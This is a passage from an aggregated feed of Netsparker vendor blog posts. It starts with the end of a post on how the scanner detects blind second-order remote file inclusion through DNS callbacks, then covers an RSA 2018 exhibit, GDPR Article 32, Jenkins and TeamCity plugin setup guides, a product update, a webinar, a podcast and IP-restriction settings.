        Another method, which is often used in automated exploitation by malicious hackers, is hard-coding the command that installs malware on the server into the included file, without further possibility of interaction. The malware in this case is often a piece of code that connects back to a command and control server, awaiting further instructions.

        How Does Netsparker Detect Second-Order RFI Attacks?

        This screenshot shows the RFI vulnerability as reported in Netsparker Desktop.

        This screenshot shows the RFI vulnerability as reported in Netsparker Desktop.

        As with other second-order and blind web application vulnerabilities, the Netsparker web application security solution probes the web application and sends a payload with a custom hash. That hash is used as a subdomain of our Netsparker Hawk testing infrastructure, which results in a URL like this:

        b92e8649b6cf4886241a3e0825bd36a262b24933.r87.me

        When the file inclusion is triggered at a later time, the vulnerability is exploited as follows:

        1. The web server tries to include a file under b92e8649b6cf4886241a3e0825bd36a262b24933.r87.me
        2. The Netsparker Hawk server responds with another payload containing code, which forces the web server to resolve yet another custom subdomain

        If the second DNS query is successful, Netsparker will confirm the blind RFI.

        Netsparker Will Be Exhibiting at the RSA Conference 2018 in San Francisco

        $
        0
        0

        Netsparker banner for RSA USA 2018

        This year Netsparker will be exhibiting at the RSA Conference in San Francisco, USA. The event will be held from April 16-20 at the Moscone Center.

        Join Us at Booth #3105 in the North Expo at RSA Conference 2018

        Members of our team will be representing Netsparker at booth #3105 in the North Expo. Our team will be available to answer any questions you might have about automatically detecting vulnerabilities in your website and web applications.

        Visit the RSA Conference website for a copy of the agenda and more information about the sessions and events.

        We look forward to meeting you there!

        Register for a Free Exhibit Hall Only Pass at RSA Conference 2018

        Use the Expo Pass Code X8ENETSP to register for a complimentary Exhibit Hall Only Pass.

        GDPR Article 32: Security of Data Processing

        $
        0
        0

        The EU General Data Protection Regulation (GDPR) is a regulation formulated by the European Union to strengthen and unify data protection for all individuals within the European Union (EU). It covers many subjects, such as Privacy by Design and Data Breaches. One section in particular, that applies to all those working in Information Security, is Article 32.

        What is GDPR Article 32?

        Article 32 lays out a few legally binding requirements for handling customer data in a secure manner, many of which have long been considered best practice. This article is designed to help businesses keep personal data secure by requiring them to adhere to its terms. It also aims to provide practical guidelines for businesses that want to improve their security procedures. In this blog post, we break down some of the most important aspects of Article 32.

        GDPR Article 32

        Using the Latest Available Tools and Software

        According to Article 32 of the GDPR regulations, only the most recent technology will suffice when implementing appropriate technical and organizational measures. What this means is that you are required to use the newest tools and methods in order to secure customer data. Depending on the context, this can range from modern, up-to-date security tools, like web vulnerability scanners and tools for logging and monitoring, to regular staff training and strong password policies.

        Databases servers, web servers and any other type of server software used in the organization have to be up-to-date and regularly patched in order to adhere to this part of the GDPR.

        Handling and Processing Personal Data

        The nature, scope and purpose of the data processing an organization performs also needs to be documented. Data must also be stored appropriately. For example, credit card data has to be handled one way, whereas email addresses will be handled a different way. Generally, the rule is that it's best to store the minimum amount data possible in order to perform a specified task.

        Segregating Data

        As an application of the above rule, organizations have to make sure they adjust their security measures to match the probability and severity of a breach against the potential impacts on rights and freedoms of data subjects.

        This means that a breach of websites that allow the exchange of sensitive data between journalists and sources, may have a higher impact on the rights and freedoms of the affected users than the breach of a site that allows people to share cooking recipes, for example. It's vital to separate and estimate these varying risks and then apply security measures appropriate to the risk.

        Minimum Compliance Requirements in Article 32

        Article 32 of the GDPR regulations state that the minimum consequences arising from regulations should include the following:

        • Personal data should be pseudonymised (for example, by replacing names with unique identifiers) and encrypted where possible.
        • Ongoing confidentiality, integrity, availability and resilience of processing systems and services must be ensured. In other words, all data should be readily available to users, and provisions should be made to ensure that it is not read or tampered with by unauthorized persons, whether accidentally or on purpose.
        • In case of a detrimental physical or technical incident, access to personal data must be able to be restored quickly. This refers to offsite backups and emergency strategies in case of unforeseen events.
        • Organizations must implement a process for regularly testing, assessing and evaluating the effectiveness of technical and organizational measures that are designed to ensure the security of processing. In other words, organizations shouldn't blindly rely on established security measures, but proactively test them in order to see whether or not they work as intended. In the case of web applications, this would include penetration testing and regular application vulnerability scanning.

        Consider All the Risks of Processing Data

        Article 32 further states that organizations must consider the risks that are presented by processing personal data. These risks might take the form of accidental or unlawful destruction, loss, alteration, or unauthorised disclosure of personal data. It also includes how personal data is accessed, transmitted and stored. This GDPR section closes by reiterating that only authorized persons should process data when they are required or instructed to do so.

        In summary, organizations should make sure that all personal data is safely stored and only transmitted to trusted, authorized persons and third parties.

        The Road to GDPR Compliance

        Implementing the varying aspects of the GDPR regulations remains a challenge for many organizations. To help you get started we have written a white paper, The Road to GDPR Compliance– a high level overview of what organizations should do in order to become GDPR compliant.

        Complying with Article 32 of the GDPR

        One way in which the technical security measures referred to in the new GDPR regulations can be implemented is by establishing a procedure for regular scans with web application vulnerability scanners. So get in touch with us to learn how Netsparker can help your organization ensure it complies with the GDPR Article 32.

        How to Install and Configure the Netsparker Cloud Scan Jenkins Plugin

        $
        0
        0

        Jenkins is an automation server that enables software developers to build automation into their projects by supplying plugins. Jenkins functionality can be extended by using our new Netsparker Cloud Scan Jenkins plugin.

        Jenkins Logo

        This article explains how to install and configure the new Netsparker Cloud Scan Jenkins Plugin to enable our advanced integration functionality so that you can launch automated scans and view reports of vulnerabilities in Jenkins.

        Downloading and Installing the Netsparker Cloud Scan Jenkins Plugin

        The plugin is packaged into an hpi file called netsparker-cloud-scan.hpi. This package has been tested and approved for Jenkins version 2.33+.

        To Download and Install the Netsparker Cloud Scan Jenkins Plugin
        1. In Netsparker Cloud, navigate to the New Integrations window, and from the Continuous Integration Systems panel, select Jenkins.

        The Jenkins Plugin Installation and Usage window is displayed.

        1. Click Download the plugin, and save the file to a location of your choice.
        2. Open Jenkins.

        1. From the main menu, click Manage Jenkins. The Manage Jenkins window is displayed.

        1. Click Manage Plugins. The Plugin Manager window is displayed.

        1. Click the Advanced tab.

        1. From the Upload Plugin section, click Choose File. The Open dialog box is displayed.

        1. Select the netsparker-cloud-scan.hpi file you downloaded previously, and click Open. The file is uploaded, and the focus of the window returns to the Advanced tab.

        1. In order to use the plugin, restart Jenkins. To restart, from a browser, navigate to:
        • [jenkins_url]/safeRestart (restarts Jenkins after the current builds have completed)
        • [jenkins_url]/restart (forces a restart and builds will not wait to complete)

        Configuring The Jenkins Project

        Each Jenkins project has its own build configuration. Each build configuration has its own build steps. The Netsparker Cloud Scan must be added to a Jenkins project as a build step.

        How to Configure the Jenkins Project
        1. Open Jenkins. From the main menu, click Manage Jenkins.

        The Manage Jenkins window is displayed.

        1. Click Configure System. The Configure System window is displayed.

        1. In the Netsparker Cloud section, enter your Netsparker Cloud Server URL and API Token, and click Test Connection to verify access to Netsparker Cloud. Then, click Save.
        2. Navigate to the Jenkins Home page and click the project you want to add to the Netsparker Cloud Scan's build step.

        1. The Project window is displayed.

        1. From the menu, click Configure. The Configure window is displayed.
        2. Click the Build tab.

        1. From the Build section, click the Add build step dropdown, and select Netsparker Cloud Scan. The Scan Settings panel is displayed.

        1. Select the relevant options from Scan Type, Website Deploy URL and Profile Name.
        2. Click Save.

        Viewing Netsparker Scan Results in Jenkins

        When the build has been triggered, you can view the scan results in the Netsparker Cloud Report window.

        How to View Netsparker Cloud Reports in Jenkins
        1. Open Jenkins.

        1. From your project page, select a build from the Build History section. The Build Detail window is displayed.

        1. From the menu, click Netsparker Cloud Report. The scan may take a while. If it is not yet finished, a warning message is displayed.

        1. When the scan has been completed, the scan results, Netsparker Cloud Executive Summary Report, are displayed.

        1. For further integration with Netsparker Cloud, you can also ensure that your SCM plugin is configured to share changelog data. From your Project window, click the Source Code Management tab. From the Additional Behaviours dropdown, select the Commiter's name.

        How to Install and Configure the Netsparker Cloud Scan TeamCity Plugin

        $
        0
        0

        This article explains the how to use the new Netsparker Cloud TeamCity plugin  to integrate Netsparker Cloud with TeamCity, to enable our advanced functionality.

        Downloading and Installing Netsparker Cloud Scan's TeamCity Plugin

        The Netsparker Cloud Scan TeamCity plugin is packaged into a zip file called netsparkercloud-teamcity-plugin.zip. This package has been tested and approved for TeamCity version 9+.

        To Download and Install the Netsparker Cloud Scan TeamCity Plugin
        1. Open Netsparker Cloud. From the menu, select Integrations then New Integrations.

        1. From the Continuous Integration Systems panel, select TeamCity.The TeamCity Plugin Installation and Usage window is displayed.

        1. Click Download the plugin, and save the file to a location of your choice.
        2. Open TeamCity.
        3. From the Admin window, click Global Settings. The Global Settings window is displayed.

        1. From the TeamCity Configuration section, next to the Data Directory field. Click Browse.
        2. Select the netsparkercloud-teamcity-plugin.zip file you downloaded previously, and upload into the plugins directory.
        3. Finally, restart TeamCity. When TeamCity's services start, it will look for the plugin packages in the plugins directory and automatically load them.

        Configuring the TeamCity Project

        Each TeamCity project has its own build configuration. Each build configuration has its own build steps. The Netsparker Cloud Scan must be added to a TeamCity project as a build step.

        How to Configure the TeamCity Project
        1. Open TeamCity. In the Admin window, from the Integration section of the main menu, click Netsparker Cloud. The Global Netsparker Cloud API Settings window is displayed.

        1. In the API Settings section, enter the API credentials: Netsparker Cloud Server URL and API Token.
        2. Click Test Connection.
        3. Click Save.
        4. From the main menu, click Projects. The Projects window is displayed.

        1. Under projects page, select the build configuration to which you want to add the Netsparker Cloud Scan plugin. The Build Configuration window is displayed.

        1. Click Edit Configuration Settings. The Build Configuration Settings window is displayed.

        1. Click Build Steps, then Add build step. The New Build Step window is displayed.

        1. From the Runner type: dropdown, select Netsparker Cloud Scan. Further fields are displayed.

        1. In the Scan Settings section, select the relevant Scan Settings (Endpoint parameters).
        2. Finally, click Save.

        Viewing Netsparker Scan Results in TeamCity

        When the build has been triggered, you can view the scan results in the (under build results page) Netsparker Scan Result tab.

        How to View Netsparker Scan Results in TeamCity
        1. Open TeamCity. On your Projects window, click the Netsparker Cloud Report tab. If the scan is not yet finished, a warning message is displayed.

        1. When the scan has been completed, the scan results, NETSPARKER CLOUD EXECUTIVE SUMMARY REPORT, are displayed.


        How to Integrate Netsparker Into Your Existing SDLC

        $
        0
        0

        What is the Software Development Lifecycle?

        The software industry has refined the Software Development Life Cycle process over many years. It is the process that software developers use to design, develop and test resilient, quality software that meets the requirements of potential customers or specific commissioning clients. It must also meet stated budgets and deadlines.

        Normally, software development passes through these key stages, beginning with Planning.

        1. The Planning stage begins with gathering requirements from potential purchasers, industry experts and existing research, and the organisation's own sales team. Collated information helps determine whether a project is financially and technically viable.
        2. The Defining stage involves getting clarity on the product requirements and documenting them, often by way of a Software Requirement Specification (SRS), which is then approved by the customer or by the Business Analysts in the organisation.
        3. The Designing stage is based on the SRS, which product architects use to construct a Design Document Specification (DDS) that may include various potential design approaches, including architecture, data flow and 3rd party integrations.
        4. The Building stage is when development begins. Developers follow the DDS and generate code according to their organization's coding guidelines document.
        5. The Testing stage can happen during all other previous stages and includes reporting of defects, which are fixed until the product reaches the required standard.
        6. The Deployment stage is when the product is released into the relevant market, or directly to the customer. Sometimes, this can be divided into further stages, released in a limited way first and tested, then released again following further fixes.

        How Does Netsparker Integrate with Your Existing SDLC?

        We developed the TeamCity and Jenkins plugins to help you complete the Netsparker Cloud-assisted SDLC. Using our plugins, users with Administration permissions can now initiate test scans, which are run using the Netsparker Cloud API in the continuous integration build.

        For further information on installing and configuring the plugins, see:

        Continuous Integration Information

        Normally, integrating Netsparker Cloud plugins into your environment is sufficient to establish a Netsparker Cloud-assisted SDLC. However, in some cases some additional configuration is necessary to to take advantage of all the benefits (see Configuring User Mappings).

        Continuous Integration (CI) is standard practice in the SDLC, where developers working in a team commit their code changes to a shared repository, meaning lots of integrations each day. Finding inevitable errors rapidly is key, to avoid breaking something else and to help the SDLC to progress quickly, so each one is automatically verified by a build that includes a test.

        When the scan is initiated from the continuous integration(CI) build via the Netsparker Cloud's new TeamCity and Jenkins plugins, you can access the CI build details as described in the following sections.

        Viewing Continuous Integration Information in Netsparker's Status Window

        You can access CI information from Netsparker Cloud scan's Status window.

        How To View CI Build Information in the Status Window
        1. Log in to Netsparker Cloud. From the Scans menu, click Recent Scans. The Recent Scans window is displayed. (If scans have been initiated by the CI server, the Website column displays a CI server icon.)

        1. For the relevant ongoing or queued scan, click Status. The Status window is displayed. From the Executive Summary panel, the Status field shows a green bar that displays the scan's current Status.

        1. In the Continuous Integration Details section, you can view build information.
        1. In the Build ID field, click the Build ID link.
          • In TeamCity:
            • The continuous integration server opens at the Build Log.

          • In Jenkins:
            • The Console Output window opens

        1. In the Commit/Changeset field, click the Commit/Changeset link.
          • In TeamCity:
            • The continuous integration server opens at the Changes tab.

          • In Jenkins:
            • The continuous integration server opens at the Changes window.

        1. Click the Netsparker Scan Result to view the scan result. The Netsparker Cloud Executive Summary Report is displayed.
          • In TeamCity:

          • In Jenkins:

        Accessing Continuous Integration Details in the Scan Report

        You can access CI details in the scan's Report window.

        How to View Continuous Integration Details in the Scan Report
        1. Log in to Netsparker Cloud. From the Scans menu, click Recent Scans. The Recent Scans window is displayed.

        1. For the relevant completed scan, click Report. The Report window is displayed.

        1. From the Scan Summary tab, in the Continuous Integration Details section, you can view build information.
        2. In the Build ID field, click the Build ID. The TeamCity application opens at the Build Log tab.
        3. Click Commit/Changeset. The TeamCity application opens at the Changes tab.
        4. Click the Netsparker Scan Result tab to view the scan result. If the scan is queued or ongoing, the following message is displayed: 'The scan report is not available yet because the scan is not finished. Please try again later.'.

        Viewing Continuous Integration Details in the Issues Window

        You can access CI information from Netsparker Cloud's Issues window.

        How to View CI Build Information in the Issues Window
        1. Log in to Netsparker Cloud. From the Issues menu, click All Issues. The Issues window is displayed.

        1. Click the Title of the relevant issue. The Issue window is displayed.

        Configuring User Mappings

        If your username in either the TeamCity or Jenkins integration systems is not the same as your Netsparker username, you can configure our User Mappings functionality to match them. You can add as many user mappings as you want. Users with Administrator permissions will be able to manage all other members' username configurations.

        User Mappings must be unique. If you attempt to add a user mapping which has the same Integration system and Integration User as an existing mapping, the following error message is displayed.

        You can add, edit or delete User Mappings.

        How To Configure a New User Mapping
        1. Log in to Netsparker Cloud. From the Integrations menu, click User Mappings.

        1. The User Mappings window is displayed.

        1. Click New User Mapping. The User Mapping window is displayed.

        1. From the Integration System field, select the relevant system.
        2. In the Integration User field, enter the relevant username used in TeamCity or Jenkins.
        3. From the Netsparker Cloud User dropdown, click the relevant username.
        4. Click Save.

        Disabling the Assigning of Issues in Netsparker to the Code Committer 

        By default, if scans are configured to be triggered by a version control system change (such as a git commit), Netsparker Cloud will assign the detected Issues to the committer.  

        Disabling this behaviour means that Netsparker Cloud will assign the detected Issues to the website's Technical Contact regardless of whether Netsparker Cloud is able to identify the committer.

        To disable this default behaviour, ask your Netsparker Administrator.

        How to Disable the Assigning of Issues in Netsparker to the Code Committer
        1. Log in to Netsparker Cloud. From the Your Account menu, click Account Settings. The Change Account Settings window is displayed.

        1. In the Account-wide Options section, check the Disable assigning issues to the committer option.
        2. Click Update.

        February 2018 Netsparker Cloud Update

        $
        0
        0

        We are happy to announce the first Netsparker Cloud update of 2018! The major highlights of this update are the integration plugins. Netsparker Cloud is the only web application security solution available on the market that enables businesses to scan thousands of websites within just hours, and generate accurate results they can act on without requiring any manual verification process.

        Netsparker Cloud’s unique ability to scale makes it a perfect solution for those businesses and enterprises that have a lot of websites they are struggling to make secure. This is why in this and future updates, we will be focusing much more on developing integration tools to easily integrate automated web vulnerability scanning in the SDLC.

        Integration Plugins for TeamCity and Jenkins

        With this release we are announcing two new integration plugins:

        Both integrations are very easy to setup because they are wizard driven, though should you need some assistance, click on the respective links above for a detailed walk-through of how to setup the integration.

        Integration Menu in Netsparker Cloud

        We have also introduced a new Integration menu in Netsparker Cloud, from which you can view all available integration plugins and set up your own integrations.

        Improved API Documentation

        Netsparker Cloud also has a fully blown REST API that can be used to integrate the web security solution with virtually any tool you typically find in the SDLC, DevOps and live environments. In this update, we have also upgraded the REST API documentation by including more examples.

        For a complete list of what is new, improved and fixed in this update, refer to the Netsparker Cloud changelog.

        Netsparker and Brinqa to Partner on Web Application Security Webinar

        $
        0
        0

        This month, Netsparker will partner with Brinqa to deliver a webinar on how businesses and organizations can secure their most exposed attack surface – web applications.

        Web Application Attacks Are the Main Cause of Data Breaches

        According to the Verizon 2017 Data Breach Investigation Report, web application hacking is the primary cause of all data breaches (62%). This figure rises to 81% when breaches are leveraged by stolen or weak passwords. Most of these attacks are perpetrated by outsiders who are financially motivated, and have little compunction whether their target is a financial organization, a healthcare body, a public sector entity, or an online retail store. And the targets of these increasingly sophisticated attackers aren't always the big boys – 61% of the data breach victims are businesses with under 1,000 employees.

        How to Secure Your Most Exposed Attack Surface

        NetSparker and Brinqa are technology companies leading the way in web application vulnerability detection, management and remediation. Netsparker is an automated, dead accurate, scalable and easy-to-use, enterprise level web application security scanner that enables businesses to finds security flaws in their websites, web applications and APIs. Brinqa is a cyber risk management platform that helps cybersecurity professionals triage and remediate threats and vulnerabilities in the context of both business impact and weaponization likelihood.

        Join Our Webinar on March 15, 2018

        Join Our Webinar on March 15, 2018

        This upcoming webinar will discuss how these two security tools can integrate with each other to create a robust web application security plan that helps AppSec programs identify, prioritize, remediate and report the most critical security flaws.

        Our speakers are Ferruh Mavituna (CEO, Netsparker) and Syed Abdur (Director of Product, Brinqa). Ferruh's background of hands-on experience and deep understanding of both the attacking and defending aspects of web application security was the impetus for Netsparker's accelerated growth. Netsparker has created technologies that have transformed automated web application security industry and is a trusted security partner for thousands of companies around the world.

        Syed's experience includes technical software development and delivering large enterprise security applications at Sun Microsystems and Oracle. He is responsible for driving the overall strategy and technical direction of Brinqa's product lines.

        Join Our Webinar on March 15, 2018

        Webinar Details

        The webinar starts at 10:00 am PST, 12:00 pm CST, 1:00 pm EST. It is free of charge and will last for 1 hour. There will be opportunity to ask questions and engage with our speakers.

        Please click here to register for the webinar.

        We look forward to you meeting you!

        Enterprise Security Weekly #81

        $
        0
        0

        Ferruh Mavituna, Founder and CEO of Netsparker, was interviewed by Paul Asadoorian and Dr Doug White during the Enterprise Security Weekly podcast show #81. During the interview, Ferruh talked about:

        • The current focus for Netsparker - scanning at scale. Netsparker Cloud is helping enterprises with thousands of web applications to find vulnerabilities automatically and then begin to take remediation action without delay. Large organizations still suffer data breaches and web application vulnerabilities remain the most common source.
        • He then highlighted the need for product honesty in the web application security industry, as the problem of false positives and poor accuracy can lead to a loss of trust by some organization leaders. Scanners that, unlike Netsparker, don't tackle the problem of false positives, can discredit the process and create problems with technology teams when dealing with management.
        • There was a discussion about the relationship between of dynamic analysis tools like Netsparker, and static analysis ones. Ferruh view was that the integration of these tools was good to pinpoint vulnerabilities, and suggested the possible use of dynamic tools to validate the findings of the static ones.
        • On the question of performance, he emphasised that once a company moves from Netsparker Desktop to Netsparker Cloud, scalability is no longer an issue, since many hundreds and thousands of websites can be scanned at once. Inaccurate scanners that generate large numbers of false positives and false alarms are an impediment to working at scale in any organization, especially one with multiple security problems and priorities to weigh up. What is vital for such organisations is vulnerability management end to end: detection, proof of exploit, details including threat levels and remediation advice.
        • It turns out that the biggest challenge to IoT devices is that their code is often written by non-web developers, and therefore don't use the the typical queries, language, servers or observe the expected coding standards. However, Netsparker could still find and validate many of their vulnerabilities.
        • Ferruh confirmed that Netsparker will be exhibiting at the RSA Conference 2018 in San Francisco. He extended an invitation to any businesses interested in web application security challenges, including scalability, to come and talk to him there.

        Securing Netsparker Cloud by Restricting IP Addresses

        $
        0
        0

        IP Address Restrictions is a feature that allows organizations to restrict from which IP Addresses users can access the Netsparker Cloud dashboard, which enhances the security of the solution. This feature is also included in the on-premises edition of the solution. Once it is enabled, anyone trying to log in to Netsparker Cloud from an IP Address not in the Trusted IP Addresses list will be denied access.

        This IP Address restriction feature is disabled by default. This document explains how to enable and configure IP Address Restrictions.

        IP Restrictions Configuration

        Only account administrators can enable or disable IP restrictions in Netsparker Cloud.

        How To Enable IP Restrictions
        1. From the Your Account menu, select IP Restrictions. The IP Address Restrictions window is displayed.
        2. Check the Enable IP Restrictions checkbox.

        Check the Enable IP Restrictions checkbox.

        Only one IP address should be added at a time. Ranges or wildcards are not supported.

        1. Click New. A new row is displayed.

        Your IP address is shown at the sidebar. We highly recommend adding it in first, in order to avoid getting locked out.

        Click New. A new row is displayed.

        1. In the Description field, enter a description for your restriction, such as Home IP Address, Office IP Address etc.
        2. In the IP Address field, enter the full IP address.
        3. Click Save.
        4. If your IP Address is not listed in the table, a warning dialog is displayed.

        If your IP Address is not listed in the table, a warning dialog is displayed.

        How To Delete a Trusted IP Address
        1. From the Your Account menu, select IP Restrictions.
        2. Next to the relevant IP Address, click x.

        What Happens When Users Try to Login from a non Trusted IP Address?

        When a user tries to login from an unlisted IP Address, the user will be redirected to the SIGN IN window, displaying an error message: 'Your IP address is not allowed (Current IP Address: #address). Please contact your Account Administrator #admin-name (#admin-email)'.

        What Happens When Users Try to Login from a non Trusted IP Address

        Viewing all 1027 articles
        Browse latest View live